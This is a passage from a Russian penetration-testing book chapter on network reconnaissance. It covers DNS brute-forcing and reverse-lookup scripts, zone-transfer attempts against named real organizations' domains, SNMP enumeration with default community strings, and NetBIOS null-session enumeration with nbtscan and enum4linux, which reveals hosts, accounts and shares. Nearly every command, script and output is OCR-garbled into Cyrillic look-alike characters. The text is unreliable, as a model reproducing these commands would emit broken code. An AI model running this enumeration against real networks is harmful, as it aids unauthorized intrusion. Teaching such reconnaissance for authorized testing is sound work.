с параметром «Ьаз асЫгезз» позволяет отфильтровать вывод таким образом, чтобы 
мы видели только удачные попытки перебора. 

Четвертая строка завершает цикл. 

Результат работы скрипта: 

гооі@каіі :~# ./Ьпзпшп.зЬ 

ѵрп .опз .§оѵ. ик Ьаз асісігезз 194.34.210.102 

ѵрп .опз .§оѵ. ик Ьаз асісігезз 194.34.211.102 


Перебор обратных записей 

Получив ІР-адреса данной организации, мы можем попытаться осуществить пере¬ 
бор обратных записей с помощью сервиса \ѵЬоіз, используя ту же утилиту Ііозі: 

гооі@ка1і:~# Ьозі 81.17.70.138 

138.70.17.81.іп-аЬсІг.агра сіотаіп пате роіпіеп аЬоиііезі:. 1апсІтапк§оѵепптеп1:.со.ик. 

Разумеется, как и в предыдущем случае, мы можем автоматизировать данный про¬ 
цесс, используя скрипт: 
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#! /Ьіп/ Ьа 5 Гі 

есііо "Ріеазе епіег пеіиогк гап§е е§: 194.29.32:" 
геасі гап§е 

■Рог ір іп ' зер 1 254';сІо 

ИозТ $гап§е.$ір |§гер "пате роіпіег" | сиі; -сі" " --Р5 
сіопе 

В данном скрипте мы считываем введенное пользователем значение, а именно три 
октета сети класса С. Затем, подставляя в последний октет значения от 1 до 254, 
выполняем команду Ьой для каждого адреса. В результате получаем следующую 
информацию, среди которой можно найти кое-что интересное: 

2.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег асІЕІ-2. змізр. со. ик. 

3.70.17.81. іп - асісі г. агра сіотаіп пате роіпіеп агсІІ-3. змізр. со. ик. 

4.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег агсІІ-4. змізр. со. ик. 

100.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег Іапсітагк.таіі . змізр. со. ик. 

124.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег таі101. 1апсітагк§оѵегптепі:. со. ик. 

125.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег таі102. 1апсітагк§оѵегптепі:. со. ик. 

129.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег арі. 1апсІтагк§оѵегптепі:. со. ик. 

130.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег п$ос1опе.1апсІтагк§оѵегптепі:.со.ик. 

138.70.17.81. іп - асісі г. агра сіотаіп пате роіпіег аЬоиііезі:. 1апсІтагк§оѵегптепі:. со. ик. 

Например, тестовые серверы или консоль БИЗ-сервера. 

БКЗКесоп — утилита, входящая в состав Каіі Ілніх. Позволяет упростить и уско¬ 
рить описанные выше процессы. 

Передача зоны ОЫ5 

Передача зоны — вид транзакции БКЗ, являющейся одним из механизмов реплика¬ 
ции баз БИЗ между серверами. В ней принимает участие клиент, запрашивающий 
передачу части данных из базы, и сервер, предоставляющий эти данные. В не¬ 
которых источниках они называются, соответственно, вторичным и первичным 
серверами. Передаваемая часть данных — зона БИЗ. 

К сожалению, некоторые администраторы неправильно конфигурируют свои 
ВХЗ-сернеры, вследствие чего любой может запросить у сервера передачу зоны 
и получить ее. 

В случае, если администратор не отделил внешние зоны от внутренних, при удач¬ 
ной передаче зоны хакер получит всю информацию о внешней и внутренней сети 
предприятия «на блюдечке с голубой каемочкой». 

Попробовать осуществить передачу зоны можно двумя Ьіпих-утилитами — Ііозі: 
или с1і§. 
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Попробуем осуществить перенос зоны почты Австралии: 

гооТ@ка1і:~# НозТ -Т П5 аизрозТ.сот.аи 
аизрозТ.сот.аи пате зегѵег к4. пзТІсі .сот. 
аизрозТ.сот.аи пате зегѵег §4. пзТІсі . сот. 
аизрозТ.сот.аи пате зегѵег а4.п5Т1сі .сот. 
аизрозТ.сот.аи пате зегѵег 14. пзТІсі . сот. 
аизрозТ.сот.аи пате зегѵег -Р4. пзТІсі .сот. 
аизрозТ.сот.аи пате зегѵег ^4. П5і;1с1 .сот. 

пооТ@ка1і :~# ИозТ -1 аизрозТ.сот.аи к4. П5і:1с1 .сот 
; ТгапзТег Таііесі. 

ІІ5іп§ сіотаіп зепѵег: 

№ате: к4. пзПсі. сот 
Асісігезз: 192.52.178.33#53 
Аііазез: 

Н05Т аиБрозТ.сот.аи поТ Тоипсі: 5(КЕРЦ5ЕР) 

; ТгапзТег Таііесі. 

Команда «Ьозі -I пз аизрозі.сот.аи» вернула нам адреса К5-серверов для домена 
аизрозі.сот.аи. 

Командой «Ьозі -1 аизрозі.сот.аи к4.пзіЫ.сот» мы попытались осуществить пере¬ 
нос зоны, но неудачно. 

Попробуем перенести зону другого сервиса: 

гооТ@ка1і:~# кіоаі; -Т пз пеТаТаТ.сІитііозГ.сот 
пеТаТаТ.сІитііогГ.сот пате зепѵеп заііапсІІ.пеТгГаТ.сіитІ'юзТ.сот. 
пооТ@ка1і:~# кіоаі; -1 пеТзТаТ.сІитНозГ.сот заііапсіІ.пеТзТаТ.сіитНозТ.сот 
ІІ5іп§ сіотаіп зепѵег: 

№ате: заМапсІІ. пеТзТаТ . сІитіюзТ. сот 
Асісігезз: 19.67.20.162#53 
Аііазез: 

пеГзТаТ.сІитііозГ.сот пате зепѵеп заііапсІІ.пеТгГаТ.сіитІ'юзТ.сот. 

Ьазі] . пеТзТаТ.сІитііозГ.сот Таз асісіпезз 19.67.20.167 
етаіізегѵег. пеТаТаТ .сіитііозі:. сот Маз асісіпеаа 19.67.20.169 
іпі5. пеТаТаТ .сіитіюаТ. сот Наа асісігеаа 19.67.20.164 
іппа .пеТаТаГ.ЦитНоаТ.сот Наа асісігеаа 19.67.20.167 
таіі. пеТаТаГ.ЦитРюаТ . сот Наа асісігеаа 19.67.20.169 
перТоп2.пеіізііаіі.сіиткіозі;. сот Наа асісігеаа 19.67.20.167 
паЗ. пеТаТаТ . сіитНоаТ. сот Наа асісігеаа 19.67.20.162 
па4.пеТаТаТ.сіитНоа1:.сот Наа асісігеаа 19.67.20.163 
заМапсІІ.пеТаТаТ. сіитіюаТ. сот Наа асісігеза 19.67.20.162 
аітог§Н.пеіізііаіі.сіиткіозі;. сот Наа асісігеаа 19.67.20.171 
Татаа.пеТаТаТ. сіитіюаТ. сот Таз асісігеаа 19.67.20.166 
ммілі. пеТаТаТ. сіитіюаТ. сот Наа асісігеаа 120.11.7.220 

Как результат, мы видим пример удачного переноса зоны. 

А теперь посмотрим, как справится с аналогичной задачей ОИЗКесоп: 

гооТ@ка1і:~# сіпагесоп -сі пеТаТаТ . сіитіюаТ .сот -Т ахТг 
[*] ТеаТіп§ N5 Зегѵега Тог 2опе ТгапаТег 

[*] Сііескіп§ То г 2опе ТгапаТег Топ пеТаТаТ .сіитіюаТ . сот пате аегѵега 



52 Глава 3 


Получение информации от сетевых сервисов 


[*] Ке50Іѵіп§ 50А КесогсІ 
[*] 

120.11.32.56 

[*] КѲ50ІѴІП§ N5 КѲСОГСІ5 

[*] N5 5егѵег$ ТоипсІ: 

[*] 

19.67.20.162 

[*] 

120.11.32.2 
[*] 

120.11.32.56 

[*] 

120.11.32.3 


50А П5І. пеТзТаТ. сШшРюбТ . сот 

N5 пзЗ. пеТзТаТ .сІитРіозТ. сот 
N5 П54.пеТзТаТ.сІитРіозТ. сот 
N5 П5І . пеТзТаТ.сІитИозІ:. сот 
N5 пз2.пеТзТаТ.сІитРіозТ. сот 


[*] Кетоѵіп§ апу сІирИсаТе N5 аегѵег ІР АсІсіге55е5... 

[*] 

[*] Тгуіп§ N5 зегѵег 120.11.32.56 

[-] 2опе ТгапзТег Раііесі Тог 120.11.32.56! 

[-] РогТ 53 ТСР І5 Ьеіп§ ТіІТегесІ 
[*] 

[*] Тгуіп§ N5 зегѵег 120.11.32.3 

[-] 2опе ТгапзТег Раііесі Тог 120.11.32.3! 

[-] РогТ 53 ТСР І5 Ьеіп§ ТіІТегесІ 
[*] 

[*] Тгуіп§ N5 зегѵег 120.11.32.2 

[-] 2опе ТгапзТег Раііесі Тог 120.11.32.2! 

[-] РогТ 53 ТСР І5 Ьеіп§ ТіІТегесІ 
[*] 

[*] Тгуіп§ N5 зегѵег 19.67.20.162 

[*]пеТ5ТаТ.сІит!іо5Т.сот пате 5егѵег 5аРіапсІ1.пеТ5ТаТ.сІитИо5Т.сот. 

[*]Ьа5і] . пеТзТаТ .сІитІіозТ. сот 19.67.20.167 

[*]етаіІ5егѵег. пеТзТаТ .сІитРіозТ. сот 19.67.20.169 

[*]іпіз. пеТзТаТ.сІитРіозТ. сот 19.67.20.164 

[ * ] іпга. пеТзТаТ. сІитРіозТ .сот 19.67.20.167 

[ * ]таі1. пеТзТаТ. сІитРіозТ .сот 19.67.20.169 

[*]перТоп2. пеТзТаТ. сІитРіозТ. сот 19.67.20.167 

[ * ] П53. пеТзТаТ. сІитРіозТ .сот 19.67.20.162 

[*]п 54. пеТ5ТаТ. сІитРіозТ .сот 19.67.20.163 

[*]5аРіапсІ1. пеТзТаТ .сІитРіозТ. сот 19.67.20.162 

[*]5ітог§Рі. пеТзТаТ .сІитРіозТ. сот 19.67.20.171 

[*]Тата5. пеТзТаТ .сІитРіозТ. сот 19.67.20.166 

[*]ммм.пеТзТаТ.сІитРіозТ .сот 81.91.7.220 


Получение информации с использованием 5ЫМР 

5КМР (Зітріе Ысілѵогк Мапа§етепР Ргоіосоі) — протокол, используемый для 
управления сетевыми устройствами. Данный протокол поддерживают такие 
устройства, как роутеры, свичи, рабочие станции, серверы и т. д. Сам сервис рабо¬ 
тает при наличии двух основных компонентов: 8ХМ Р-агепта, который находится 
на ведомом устройстве, и 8і\' М Р-сервера, который осуществляет управление ве¬ 
домым устройством. 
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$\'М Р-протокол предусматривает два уровня доступа. Первый позволяет считы¬ 
вать информацию об устройстве (геаб сотпшпйу 8ігіп§), а второй — менять кон¬ 
фигурацию ведомого устройства (геаб/дагйе соттипйу 5йтп§). Стоит заметить, 
что по умолчанию можно считать геаб соттшійу 5ігіп§ без пароля, а для геаб/ 
ѵѵтіТс соттшШу 8ігіп§ многие администраторы оставляют стандартный пароль, 
предусмотренный тем или иным разработчиком. 

Упомянутый протокол работает на основе СГОР, имеет слабую систему аутенти¬ 
фикации и неустойчив к спуфингу. Данные передаются без шифрования и могут 
быть перехвачены. 

Обычно ЗИМР используют для мониторинга всевозможных параметров различных 
устройств, но на наш взгляд, ДЫМР представляет большую угрозу для безопасности 
организаций. 

Существует целый ресурс, посвященный стандартным паролям различных постав¬ 
щиков оборудования и программного обеспечения, — тѵотсІе/аиІіра$$июгсІ$.сот. 

Для получения списка хостов, которые поддерживают ЗКМР-протокол, можно 
использовать шпар: 

гооТ@ка1і:~# птар -ѵ -р 161 192.168.1.0-254 

5ТагТіп§ КІтар 7.30 ( НТТр5://птар.ог§ ) аТ 2016-10-15 15:39 РІ_Е Рау1і§ІіТ 
ТітеІпіТіаТіп@ АКР Ріп§ 5сап аТ 15: 395саппіп§ 255 М 05 Ц 5 [1 рогТ/Ііо5Т]Сотр1еТесІ 
АКР Ріп§ 5сап аТ 15:39, 1.245 еіарзесі (255 ТоТаІ Но5Т5)ІпіТіаТіпё Рагаііеі РЦБ 
ге501иТіоп оТ 255 Ьо5Т5. аТ 15: ЗЭСотрІеТесІ Рагаііеі РИБ гезоІиТіоп оТ 255 Н 05 Т 5 . аТ 
15:39, 0.025 е1ар5есІМтар 5сап герогТ Тог 192.168.1.0 [Т 105 Т: сІоиіДІЧтар 5сап герогТ 
Тог 192.168.1.1 [ М 05 Т сІомп]Мтар 5сап герогТ Тог 192.168.1.2 [ІЮ5Т сіомп]... 

КІтар 5сап герогТ Тог 192.168.1.158 [Н 05 Т сіомп] 

КІтар 5сап герогТ Тог 192.168.1.160 [Н 05 Т с!омп]Цтар 5сап герогТ Тог 192.168.1.161 
[Н 05 Т сіомп]Мтар 5сап герогТ Тог 192.168.1.163 [Ьо5Т сІомп]ІпіТіаТіп§ БУИ БТеаІТН 
Бсап аТ 17:285саппіп§ 76 Н 05 Т 5 [1 рогТ/Ііо5Т]Сотр1еТесі БУИ БТеаІТІі Бсап аТ 
17:28, 0.485 е1ар5есі (76 ТоТаІ рогТ5)Цтар 5сап герогТ Тог гп14591.тусогр.ог§ 

(192.168.1.19)Н05Т І5 ир (0.005 ІаТепсу). Р0КТ БТАТЕ 5ЕКѴІСЕ161/Тср СІ05ѲСІ 
5птрМАС Асісіге55: О4:85:64:В8:06:В6 (НемІеТТ РаскагсІ) 

КІтар 5сап герогТ Тог 192.168.1.23Н05Т І5 ир (0.005 ІаТепсу).РОКТ БТАТЕ 
5ЕКѴІСЕ161/Тср ТіІТегесі 5птрМАС Асісіге55: ЗС:07:54:28:А7Щ5 (Арріе) 

КІтар 5сап герогТ Тог Ь-т01-6.тусогр.ог§ (192.168.1.32)Но5Т І5 ир (0.005 ІаТепсу). 
РОКТ БТАТЕ 5ЕКѴІСЕ 161/Тс р СІ05ѲСІ 5птрМАС АсісІге55: 00: Ю: 70: ЕА: ЗВ: ЗЕ (СІ5СО 
Бу5Тет5) 

КІтар 5сап герогТ Тог Ь-т01-1.тусогр.ог§ (192.168.1.34)Н05Т І5 ир (0.005 ІаТепсу). 
РОКТ БТАТЕ 5ЕКѴІСЕ161/Тср СІ05ѲСІ 5птрМАС Асісіге55: 00: Ю : 70: ЕА: 39: Е0 (СІ5СО 
Бу5Тет5) 

КІтар 5сап герогТ Тог Ь-т01-3.тусогр.ог@ (192.168.1.35)Н05Т І5 ир (0.005 ІаТепсу). 
РОКТ БТАТЕ 5ЕКѴІСЕ 161/Тс р ореп 5птрМАС АсісІге55: 00: Ю: 70: ЕА: ЗА:72 (СІ5СО 
Бу5Тет5) 

. ..КІтар 5сап герогТ Тог гп16555.тусогр.ог§ (192.168.1.201)НО5Т І5 ир 
(0.005 ІаТепсу). РОКТ БТАТЕ 5ЕКѴІСЕ161/Тср ТіІТегесі 5птрМАС Асісіге55: 

Е4:11:5В:58:03:Е2 (НемІеТТ Раскагсі)Мтар 5сап герогТ Тог гп18405.тусогр.ог§ 

(192.168.1.205)Но5Т І5 ир (0.005 ІаТепсу). РОКТ БТАТЕ 5ЕКѴІСЕ161/Тср ТіІТегесі 
5птрМАС АсІсІге55: 90:В1:1С:81:9В:АВ (РеП) 

ІМтар 5сап герогТ Тог 192.168.1.206НО5Т І5 ир (0.005 ІаТепсу).РОКТ БТАТЕ 5ЕКѴІСЕ 
161/Тср ореп 5птр 

МАС АсІсІге55: С0:56:ЕЗ:А0:01:ОР (Нап§гІіои Нікѵі5іоп Рі§іТа1 ТесНпо1о§у) 
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Далее мы рассмотрим несколько интересных примеров того, как, используя 8ХМ И 
можно получить информацию о целевой системе. 

Используя утилиту зптрлѵаік, которая работает как под ОС Ьіпих, так и под 
\Ѵ г ііі(1оѵѵ8, можно получить всю информацию о системе или хотя бы ее часть. 

Получим всю доступную информацию: 

гооТ@ка1і:~# зптріліаік -ѵ2с -с риЬІіс ІосаІИозТ 

5ММРѵ2-МІВ: : зузРезсг. 0 = 5ТКІМС: Ипих Іосаііюзі: ЛосаІЗотаіп 2.6.32-122.е16.х86_64 
#1 5МР ИесІ 5ер 9 23:54:34 Е5Т 2016 х86_64 

5ММРѵ2-МІВ: : зузОЬзесТЮ. 0 = ОЮ: МЕТ-5ММР-МІВ: : пеТЗптрДеепТОЮБ . 10 

РІ5МАМ- ЕѴЕІМТ-МІВ: :зузІІрТітеіпзіапсе = ТітеТіскз: (99554) 0:16:35.54 

5ММРѵ2-МІВ: : зузСопТасТ .0 = БТРІИС: КооГ сгоо-ЦаЦосаПюзТх (согѵРі§иге /еТс/зптр/зптр. 

Іосаі. соп-р) 

5ММРѵ2-МІВ: : зузМате .0 = 5ТКІИС: ІосаПіозТ. Іосаісіотаіп 

5ММРѵ2-МІВ: :зузЕосаТіоп.0 = 5ТКІМ6: ІІпкпомп (есІіТ: /еіс/зптр/зптрсі. соггР) 

В данном случае мы запросили всю доступную информацию о целевой машине. 
В параметрах указан домен риЫіс и версия протокола — 2. 

Теперь получим список пользователей одного из ранее найденных хостов: 

гоо1@ка1і:~# зптршаік -с риЬІіс 192.168.1.201 .1.3.6.1.4.1.77.1.2.25 

епіегргізез .77.1.2.25.1.1.101.115.115 = "ЗАСК" 
еп1:егргІ5е5.77.1.2.25.1.1.65.82.84.77.б5.78 = "50ИЕ" 
ѲПІ:егрпІ5е5.77.1.2.25.1.1.65.82.84.77.65.78 = "ІѴА5НСЕК" 
епіегргізез .77.1.2.25.1.1.114.97.116.111.114 = "АсІтіпізТгаТоп" 
епіегргізез.77.1.2.25.1.1.116.85.115.101.114 = "ТзІпТегпе-Шзег" 
епіегргізез .77.1.2.25.1.1.118.105.99.101.115 = '^еТБІіомЗегѵісез" 


Существует множество 8N М Р- 11 арам етроі>,, которые может запросить пользователь. 
Ниже мы приведем некоторые из них: 


1.3.6.1.2.1.25.4.2.1.2 

Запущенные программы 

1.3.6.1.2.1.6.13.1.3 

ТСР порты 

1.3.6.1.2.1.25.6.3.1.2 

Установленное ПО 

1.3.6.1.2.1.25.2.3.1.4 

Хранилища данных 


Получение информации 
с использованием №№105 

№іВЮ5 — протокол, который был разработан компанией ІВМ для работы в ло¬ 
кальных сетях. Начиная с ѴѴіпсІоѵѵя ХР 5Р2 и ѴѴіпсІоѵѵз Зегѵег 2003 он был перера¬ 
ботан компанией МісгозоЙ и стал более безопасным. Однако более старые версии 
ѴѴпкІоѵѵз, а также сервис ЗатЪа, который работает под управлением Ьіпих, все еще 
имеют ряд серьезных уязвимостей. 
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Для начала найдем хосты, которые поддерживают нужный протокол: 

гооР@ка1і :~# птар -ѵ -р 139,445 192.168.1.0-254 

5РагРіп§ ІМтар 7.30 ( НРРр5://птар.ог§ ) аР 2016-10-15 15:39 ЕЬЕ Оау1і§Ш 
ТітеІпіРіаРіп@ АКР Ріп§ 5сап аР 15: 39$саппіп§ 255 Н 05 Р 5 [1 рогР/Ьо5Р]Сотр1еРесІ 
АКР Ріп§ 5сап аР 15:39, 1.245 е1ар5ес! (255 РоРаІ Мо5І:5)Іпі1:іа1:іп§ Рагаііеі 0И5 
ге501иРіоп оР 255 Ьо5Р5. аР 15: ЗЭСотрІеРесІ Рагаііеі ЦМ5 ге501иРіоп оР 255 Н 05 Р 5 . аР 
15:39, 0.025 е1ар5есМтар 5сап герогР Рог 192.168.1.0 [Ьо5Р сІоип]Мтар 5сап герогР 
Рог 192.168.1.1 [ Ио5Р сІомп]Мтар 5сап герогР Рог 192.168.1.2 [Ьо5Р сіомп]... 

Мтар 5сап герогР Рог 192.168.1.158 [Но5Р сіомп] 

КІтар 5сап герогР Рог 192.168.1.160 [Но5Р гіомп]Цтар 5сап герогР Рог 192.168.1.161 
[Ио5Р сіомп]Мтар 5сап герогР Рог 192.168.1.163 [Ьо5Р сІомп]ІпіРіаРіп§ 5ѴИ 5Реа1РН 
5сап аР 15:395саппіп§ 89 Но5Р5 [2 рогР5/Ьо5Р]ОІ5соѵегесІ ореп рогР 139/Рср оп 
192.168.1.190І5соѵегесІ ореп рогР 139/Рср оп 192.168.1.70і5соѵегесі ореп рогР 139/ 

Рср оп 192.168.1.58РІ5соѵегесі ореп рогР 139/Рср оп 192.168.1.6ЮІ5соѵегесі ореп рогР 
139/Рср оп 192.168.1.670і5соѵегесІ ореп рогР 139/Рср оп 192.168.1.690і5соѵегесІ ореп 
рогР 139/Рср оп 192.168.1.730і5соѵегесі ореп рогР 139/Рср оп 192.168.1.870і5соѵегесі 
ореп рогР 139/Рср оп 192.168.1.90ОІ5соѵегесІ ореп рогР 139/Рср оп 192.168.1.89... 
ОІ5соѵегесІ ореп рогР 139/Рср оп 192.168.1.920і5соѵегесІ ореп рогР 139/Рср оп 
192.168.1.990І5соѵегесІ ореп рогР 139/Рср оп 192.168.1.950і5соѵегесІ ореп рогР 
139/Рср оп 192.168.1.10ЮІ5соѵегесІ ореп рогР 139/Рср оп 192.168.1.100ОІ5соѵегесІ 
ореп рогР 139/Рср оп 192.168.1.102ОІ5соѵегесі ореп рогР 139/Рср оп 
192.168.1.103ОІ5СОѵегесі ореп рогР 139/Рср оп 192.168.1.107 
СотрІеРесІ 5УІ\І ЗРеаІРН 5сап аР 15:48, 1.345 е1ар5есі (178 РоРаІ рогР5)Мтар 
5сап герогР Рог гп28684.туог§. пер (192.168.1.5)Н05Р І5 ир (0.00205 ІаРепсу). 

РОКТ 5ТАТЕ 5ЕКѴІСЕ139/Рср ореп пеРЬІ05-55п445/Рср РіІРегесі тісго5оРР- 
СІ5МАС АсІсІге55: 1С:В9:03:АЕ:6А: Е1 (НемІеРР РаскагсІ)Мтар 5сап герогР Рог гп28337. 
туог§. пер (192.168.1.7)Н05Р І5 ир (0.00205 ІаРепсу).РОКТ 5ТАТЕ 5ЕКѴІСЕ139/Рср 
ореп пеРЬІ05-55п445/Рср ореп тісго5оРР-сІ5МАС Асісіге55: 62:51:0Р:53:ЗА:2Р (НемІеРР 
РаскагсІ)... 

КІтар 5сап герогР Рог гп14591.туог§.пеР (192.168.1.19)Но5Р І5 ир (0.00205 ІаРепсу). 
РОКТ 5ТАТЕ 5ЕКѴІСЕ139/Рср ореп пеРЬІ05-55п445/Рср ореп тісго5оРР-сІ5МАС 
АсісІге55: Р1 :85:62:В8:03:В6 (НемІеРР РаскагсІ) 

КІтар 5сап герогР Рог 192.168.1.23Н05Р І5 ир (0.00205 ІаРепсу).РОКТ 5ТАТЕ 
5ЕКѴІСЕ139/Рср сІ05есІ пеРЬІ05-55п445/Рср сІ05есі тісго5оРР-сІ5МАС АсІсІге55: 

1С:02:54:25:А7:05 (АррІе)Мтар 5сап герогР Рог Ь-т01-6.туог§.пеР (192.168.1.32)Н05Р 
І5 ир (0.00385 ІаРепсу). РОКТ 5ТАТЕ 5ЕКѴІСЕ139/Рср СІ05ѲСІ пеРЬІ05-55п445/Рср 
сІ05есІ тісго5оРР-сІ5МАС АсІсіге55: 00:1С:70:Е0:ЗВ: 1Е (СІ5со 5у5Рет5)Мтар 5сап герогР 
Рог Ь-т01-1.туог§.пеР (192.168.1.34)Н05Р І5 ир (0.00385 ІаРепсу).РОКТ 5ТАТЕ 
5ЕКѴІСЕ139/Рср сІ05есІ пеРЬІ05-55п445/Рср сІ05есі тісго5оРР-сІ5 

МАС АсІсІге55: 0С: 12:70:ЕА:49:Е0 (СІ5со 5у5Рет5)Мтар 5сап герогР Рог Ь-т01-3.туог@. 
пеР (192.168.1.35)Но5р І5 ир (0.00385 ІаРепсу).РОКТ 5ТАТЕ 5ЕКѴІСЕ139/Рср 
сІ05есІ пеРЬІ05-55п445/Рср сІ05есі гпісго5оРР-сІ5МАС АсІсіге55: 00:Ю:О0:ЕА:ЗС:72 (СІ5со 
5у5Рет5) 

пЪТзсап — утилита, которая поддерживается ОС \\1 п<1 о\Ѵ8 и Ьіпих, она работает из 
командной строки. С помощью нее можно просмотреть список доменов и входящих 
в состав каждого домена компьютеров, а также получить другую информацию. 

гооР@ка1і:~# пЬР5сап -г 192.168.126.0/24 

Роіп§ N61 пате 5сап Рог асісІге55е5 Ргот 192.168.126.0/24 

ІР асісІге55 МеРВІ05 N3^16 5егѵег ІІ5ег МАС асІсІге55 


192.168.126.0 


ЗепсІРо Раііесі: Регті55іоп сіепіесі 
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192.168.126.129 <ипкпомп> <ипкпомп> 

192.168.126.171 0К6\2І_25424 <зегѵег> ЗНАКОМ а0: ІсІ :48:12: 9сІ : 36 

192.168.126.172 ОК6\2И5917 <зегѵег> КІМСО 64: 31: 50: аі :Т5: 57 

192.168.126.174 ОК6\2І_16500 <зегѵег> КАІМОКЮ 90: Ы: 1с :6Ь: 5Ь:с4 

ІМиІІ 5Ѳ55ІОП 

№11 8С88ІОМ — это неавторизированная Кеі В 108-сессия между двумя компьютера¬ 
ми. Она применяется для получения информации о серверах \Ѵпк1оѵѵ8 и ресурсах 
общего пользования. Если в сети разрешено устанавливать сеансы такого типа, то 
они позволят нам получить огромное количество информации, такой как политики 
паролей, имена пользователей и названия групп, имена компьютеров и т. д. 

Попробуем получить список ресурсов, предоставляемых одной из машин: 

С: \Ц5ег5\Т:е5Т:>пе1; ѵіем \\АІДКІІМ 
БІіагесІ гезоигсез а! \\АІІКІІМ 
БІіаге пате Туре ІІзесІ аз СоттепТ 


МоЫІе Эізк РиЬІіс ассезз 

Тезѣ Эізк 

ТГіе соттапсі сотріеіесі зиссеззТиІІу. 

А теперь получим список учетных записей на удаленной машине: 

С: \ІІ5егз ХТез'ЬхпЫз'ЬаТ: -А 192.168.10.56 
Іосаі Агеа СоппесТіоп: 

Иосіе ІрАсісІгезз: [192.168.10.56] Бсоре ІсІ: [] 

ІМеТВІОБ РетоТе МасИіпе Мате ТаЫе 

ІЧате Туре БТаТиз 


АІІКІІМ <00> ШЦШЕ Ке§І5ТегесІ 

ИША <00> 6К01ІР Ке§із1:егесІ 

5ИѴІЗА <20> ІІМіріІЕ Ке§із1:егесІ 

МАС Асісігезз = 00-Е6-43-21-РЕ-Ю 

В случае, если вы являетесь Ыішх-пользователем, самым простым способом для 
получения полной информации, предоставляемой 8ММ Р-агептом, будет исполь¬ 
зование утилиты епиш4Ііпих. Данная утилита позволяет получить всю возможную 
информацию о системах под управлением ОС \Ѵіпс1о\ѵ8 и Вігшх и серверах с уста¬ 
новленным сервисом 8атЪа. 

Теперь продемонстрируем работу этой программы и посмотрим, какие данные нам 
удалось собрать: 

гоо1@ка1і:~# епит41іпих.рі 192.168.126.171 
БТагПпё епит41іпих Ѵ0.8.9 


Таг§еТ ІпТогтаІіоп 
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Таг§еР . 192.168.126.171 

КЮ Кап§е . 500-550Д000-1050 

ІІзегпате . ' ' 

Раззмогсі . ' ' 

Кпомп ІІзегпатез .. асітіпізРгаРог, §иезР, зНагоп, попе 


ЕпитегаРіп§ МУООМАІМ/Оотаіп оп 192.168.126.171 


[+] Со! сіотаіп/МУООМАІМ пате: МУОКС 


МЬРзРаР ІпРогтаРіоп -Рог 192.168.126.171 


І_оокіп§ ир 5РаРиз оР 192.168.126.171 

ЫЮ5КѴ <00> - М <АСТІѴЕ> ЫогкзРаРіоп 5егѵісе 

ІлІІЫЗ <03> - М <АСТІѴЕ> Меззеп§ег 5егѵісе 

А0МІМІ5ТКАТ0К <03> - М <АСТІѴЕ> Меззеп§ег 5егѵісе 

МУРОМАЮ <00> - <СКОЦР> М <АСТІѴЕ> Оотаіп/МУООМАІМ Мате 

МУРОМАЮ <1е> - <СК01ІР> М <АСТІѴЕ> Вгомзег 5егѵісе ЕІесРіопз 

ЫЮ5КѴ <20> - М <АСТІѴЕ> Рііе 5егѵег Зегѵісе 

МАС Асісігезз = 00Ю0-СЗ-АО-11-65 


5еззіоп СИеск оп 192.168.126.171 


[+] 5егѵег 192.168. 126.171 аііомз зеззіопз изіп§ изегпате 'раззмогсі '' 


СеРРіп§ сіотаіп 5Ю Рог 192.168.126.171 


Ротаіп Иате: МУОКС 
Ротаіп 5ісІ: (ШІ_І_ 5Ю) 

[ + ] Сап'Р сІеРегтіпе ІР ЬозР із рагР оР сіотаіп ог рагР оР а могк§гоир 


05 іпРогтаРіоп оп 192.168.126.171 


[+] 6оР 05 іпРо Рог 192.168.126.171 Ргот зтЬсІіепР: 0отаіп=[МУ00МАІМ] 05= [ілііпсіоѵѵ/з 
5.0] 5егѵег=[Иіпсіом5 2000 І_АІ\І Мапа§ег] 

[+] СоР 05 іпРо Рог 192.168.126.171 Ргот згѵіпРо: 

192.168.126.171 Ілік 5ѵ 5р1 М 5МТ ВМВ 

р1аРРогт_ісі : 500 

оз ѵегзіоп : 5.0 

зегѵег Руре : 0x29007 


ІІзегз оп 192.168.126.171 | 


іпсіех: 0x1 КЮ: ѲхЗеР асЬ: 0x00000010 АссоипР: асітіп Мате: (пиіі) Резс: 
(пиіі) 

іпсіех: 0x2 КЮ: 0х1Р4 асЬ: 0x00000210 АссоипР: АсітіпізРгаРог Иате: (пиіі) 
Резс: ВиіІР-іп ассоипР Рог асітіпізРегіп^ РИе сотриРег/сіотаіп 
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іпсіех: 0x6 КЮ: 0х1Т5 асЬ: 0x00000215 АссоипТ: СиезТ Мате: (пиіі) 
ВиіІТ-іп ассоипТ Тог §иезТ ассезз То ТТе сотриТег/сІотаіп 

изег : [ асітіп ] пісі:[0хЗеТ] 

изег: [АсІтіпізТпаТог] гісІ:[0х1Т4] 

изег: [СиезТ] гісі:[0х1Т5] 


5Напе ЕпитегаТіоп оп 192.168.126.171 


0отаіп=[МУ0К6] 05 =[Иіпсіом 5 5.0] 5егѵег=[ИіпсІом5 2000 ТАИ Мапа§ег] 
0отаіп=[МУ0К6] 05 =[Иіпсіом 5 5.0] 5егѵег=[ІлІіпсІом5 2000 ТАИ Мапа§ег] 


5Иагепате 

Туре 

СоттепТ 

ІРС$ 

ІРС 

КетоТе ІРС 

АОМІМ$ 

Різк 

КетоТе Асітіп 

С$ 

Різк 

ОеТаиІТ зИапе 


зеззіоп периезТ То 192.168.126.171 Таііесі (Саііесі пате поТ ргезепТ) 
зеззіоп периезТ То 192 Таііесі (Саііесі пате поТ ргезепТ) 

[+] АТТетрТіп@ То тар зііапез оп 192.168.126.171 
//192.168.1.20/1РС$ Марріп§: ОК ТІ5Тіп§: ОЕМІЕО 
//192.168.1.20/ АОМІМ$ Марріп§: ОЕМІЕО, И5Тіп§: М/А 

//192.168.1.20/с$ Марріп§: РЕМІЕО, ТізТіп§: М/А 


РаззмопсІ Роіісу ІпТоптаТіоп Топ 192.168.126.171 


[+] АТТасНіп§ То 192.168.1.20 изіп§ а МІІШ зТаге 

[+] Тгуіп§ ргоТосоІ 445/5МВ... 

[+] РоипсІ сіотаіп(з): 

[ + ] ІДІІМ5КѴ 
[+] ВиіІТІп 

[+] РаззмогсІ ІпТо Топ Оотаіп: ІЛІІМ5КѴ 

[ + ] Міпітит раззмогсІ 1еп§ТН: Мопе 
[ + ] РаззмопсІ НізТогу 1еп§ТІі: Мопе 

